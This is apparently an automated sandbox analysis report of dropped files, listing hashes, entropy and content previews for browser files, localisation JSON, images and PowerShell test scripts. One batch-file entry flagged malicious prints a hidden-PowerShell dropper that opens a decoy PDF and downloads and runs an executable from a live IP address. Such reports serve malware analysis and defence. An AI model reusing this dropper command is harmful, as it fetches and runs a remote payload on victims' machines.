                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:PNG image data, 340 x 191, 8-bit/color RGBA, non-interlaced
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):704145
                                                                                                                                                      Entropy (8bit):7.998010742509996
                                                                                                                                                      Encrypted:true
                                                                                                                                                      SSDEEP:12288:jUHH5RM4U+zthvc2KfTIs2XC170Ti9JPNfgBTIxXL2v6YRl5JCqqpRFW0X2yk:2H5RM6znvS3X17as1IBTI9LkhSqqQ0Xq
                                                                                                                                                      MD5:1BA65DA3C47B5967F72D528730CE25FB
                                                                                                                                                      SHA1:E62862E0E02619A6F71D3B5A9F52745E4457E85F
                                                                                                                                                      SHA-256:5D1D3CE3130B8F96AD1A82722C4A6EDC05AB8039B806D21DDD1629C6716C89AB
                                                                                                                                                      SHA-512:82BF8C9F14A0D8B2851E2E7878DFFC40D6E72A71D65A4246C7DD40CDABFBA7A612A573BE03CA868F2C35518F7860C855C837C893206B9664955E43AAC0AD46ED
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.PNG........IHDR...T..........f$@....sRGB....... .IDATx^.....Y.....3...{u.m.[X..s.w...'.p...I.;....$.1.#...1...68....l...u..Ziw...3....u?]]...3.+.4..jf.......sUUm.Qo..4.....Y3....*...z..~Z..,....)].....7Z.%.T^G..e^.5..O....n.kV+.*H..F#.3..n...f..z.[+.u..Zh..f~lZ.5....L....SP..8^..3.....V0-.I..K..^Y...N..4..[e...:.>1_j.......i..>...5P..Xg...BO...f.J...Z....D.;......+..P..i._..*...<.E....L........)....~...e`.....%@....j...R.x.0~...n..n.`{r.5...-NB..1..U.,..._5^.*T...sL.w......=...@Z.....&S@..P...g...A.~.\.$%U....Z[.,.k.....4..<..H.sU.5.d....v..b...].W..v@...."o......6.:...n,+3..6Q.@.../..^..;....VPT{.0.A..lYWw...v..........K..6/).O..p#.A.'q...^.j.......F.;....J,F..q&.FCU......_...._m......g.WtM........ ..iT."....])d..AA7i..=R'.P.l.C..y..3.cU.D."5.{q....T...m..[...)....&......V.Z...k.@.R|.h^]S{5...i...A'...6[..~...5.BU....P;cR...a?@m/.._...i_a.~... B_a6:@.....d...N)i?K....9..'s..i./Z*.|..h.WQ.CMm.].DE.+*lK. ..'.....6Em..k.E..@..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):353
                                                                                                                                                      Entropy (8bit):5.315392338942215
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:YETOV7KkVA5vEEGx56s/uTOVBffh0JQJjDrwv/uTOVMwfvOIJL56s/C:YKOV5G58Eu56s/MOVBfJc0Dkv/MOVTXC
                                                                                                                                                      MD5:1754226C68F167080E88EDF06F6401BD
                                                                                                                                                      SHA1:1EE27F4C3279B705A2BFC03141248BECFDBA5498
                                                                                                                                                      SHA-256:BF522C214EF21EB4A1A007D222D216246586459F3AF9AC2865B9AD1BD36B1440
                                                                                                                                                      SHA-512:BDF419A5B78CFE6CD67D1C5F5D01D04B6147F7A4DE48C03EB867E192D2E10EDCCCDC9A559D6801F57A4F3C2F7EE1C4724BCBF44C593EB5592AE3A858C60559D1
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"logTime": "1204/125818", "correlationVector":"qJ0Bo1X0vqom1uZNOctlju","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1204/125818", "correlationVector":"BB381605781E4CC490CFCCB8122DC8A5","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1204/125818", "correlationVector":"e3I7uDuebd6WiJmIMkhEEh","action":"EXTENSION_UPDATER", "result":""}.
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:DOS batch file, ASCII text, with very long lines (339), with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):399
                                                                                                                                                      Entropy (8bit):5.187685272648819
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:0G81kTQJrDheJSylFt1M40WFxF52JrDheb9lsiwP:0G4ml2kzDyA9ljy
                                                                                                                                                      MD5:1F58D6A4690FD06DCBF2215F4F4DAE7B
                                                                                                                                                      SHA1:DB39BE662FFCBAAD7A874BBE03C9C32D6455CBAF
                                                                                                                                                      SHA-256:8DE3D851EFC7E0D42DA0ECBC656AB93362595101D30B36CE36B7D698CDD99CD0
                                                                                                                                                      SHA-512:CB1E67FA33A8D7851059D7B1293E0E6E4D0CAF1B5E28B146FAE46134361A50D1FD86D1445A8385BBBD8252DAAD41AF257A00391B8735CC333C67DFE63C50F0F1
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview:@echo off..powershell -WindowStyle Hidden -Command ^.. "IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -OutFile "$env:temp\readme.pdf" ; Start-Process 'msedge.exe' -ArgumentList \"--kiosk $env:temp\readme.pdf\" ; IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -OutFile "$env:temp\123123213123123321132.exe" ; start "$env:temp\123123213123123321132.exe""..exit
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:PDF document, version 1.7
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):656088
                                                                                                                                                      Entropy (8bit):7.994208869820549
                                                                                                                                                      Encrypted:true
                                                                                                                                                      SSDEEP:12288:r/TWRciaGbqp+t4v1TxPDt75QhxfR4/xFSnhfCsP10+:jTgc3Iq+0hxLt75Q6ZFShf/Pm+
                                                                                                                                                      MD5:19E87DB70542A9FA556C1412E35FC300
                                                                                                                                                      SHA1:B74FE6AB84969B938BF76E2A780546CFC727EAFB
                                                                                                                                                      SHA-256:CF41E7881EC4A232F462EF0FC0E15C409619D18B3A8A84B49768268505AF80E3
                                                                                                                                                      SHA-512:3983D20EF020BCAED0A3269CAE844B35BFCC99558820697517D4C9BDBD886D425A3236D08DB9194E816F0AACE2E6DDEFF0F95A693B4ED7FC3B91EBA018CEF440
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:%PDF-1.7.%.....18 0 obj.<<./Length 293./N 3./Filter /FlateDecode.>>.stream.x.}..J......(.....28.h..iRpi"..V..S..A.OHS..tspu+....c(....#....AR.x.......@.....?..F..[V[..G@`*...dK..$...O.K..o...@...6..`.O.,f'..O. .a.sx.0A..6..vf...8....{c7..%op..Z.:u.....Q.......0Q.F.....*....(.S....DGACAa..j.g.rx....]..s...PxM.......c...vhO.<..v....-X}...b3~...*....mDJH.T~...K..endstream.endobj.19 0 obj.<<./Type /XObject./Subtype /Image./Width 2400./Height 1363./ColorSpace /DeviceRGB./BitsPerComponent 8./ColorTransform 0./Filter [/FlateDecode /DCTDecode]./DecodeParms [null <<./Quality 45.>>]./Length 11488.>>.stream.x..}}p..y.}. ....:..4nA'`........I..e.....T].).E.!....&u..9.&k.0-.]A.......m...V.Lf.FP..!.4M..Q.......M......gw...=H....x.....o...........x&qj......F.3.}...O......}.?.......}.....~lq.-,}.g?....K......>......\_.....I..f.x.........G.....w....\:~9.|.".h2.h..7..5.Hf.._B.K.....G...:A>..D*.N......y........Sg.g....=..+..~.+.~...............N.wtl|..O..O......CO........B.r...|..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):138356
                                                                                                                                                      Entropy (8bit):7.809609231921042
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                      MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                      SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                      SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                      SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....|..F....|....V....w.%t.y..?..&..a..<.n....S+|..=.ra.....
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4982
                                                                                                                                                      Entropy (8bit):7.929761711048726
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                      MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                      SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                      SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                      SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):908
                                                                                                                                                      Entropy (8bit):4.512512697156616
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                      MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                      SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                      SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                      SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1285
                                                                                                                                                      Entropy (8bit):4.702209356847184
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                      MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                      SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                      SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                      SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1244
                                                                                                                                                      Entropy (8bit):4.5533961615623735
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                      MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                      SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                      SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                      SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):977
                                                                                                                                                      Entropy (8bit):4.867640976960053
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                      MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                      SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                      SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                      SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3107
                                                                                                                                                      Entropy (8bit):3.535189746470889
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                      MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                      SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                      SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                      SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1389
                                                                                                                                                      Entropy (8bit):4.561317517930672
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                      MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                      SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                      SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                      SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1763
                                                                                                                                                      Entropy (8bit):4.25392954144533
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                      MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                      SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                      SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                      SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):930
                                                                                                                                                      Entropy (8bit):4.569672473374877
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                      MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                      SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                      SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                      SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                      Malicious:false
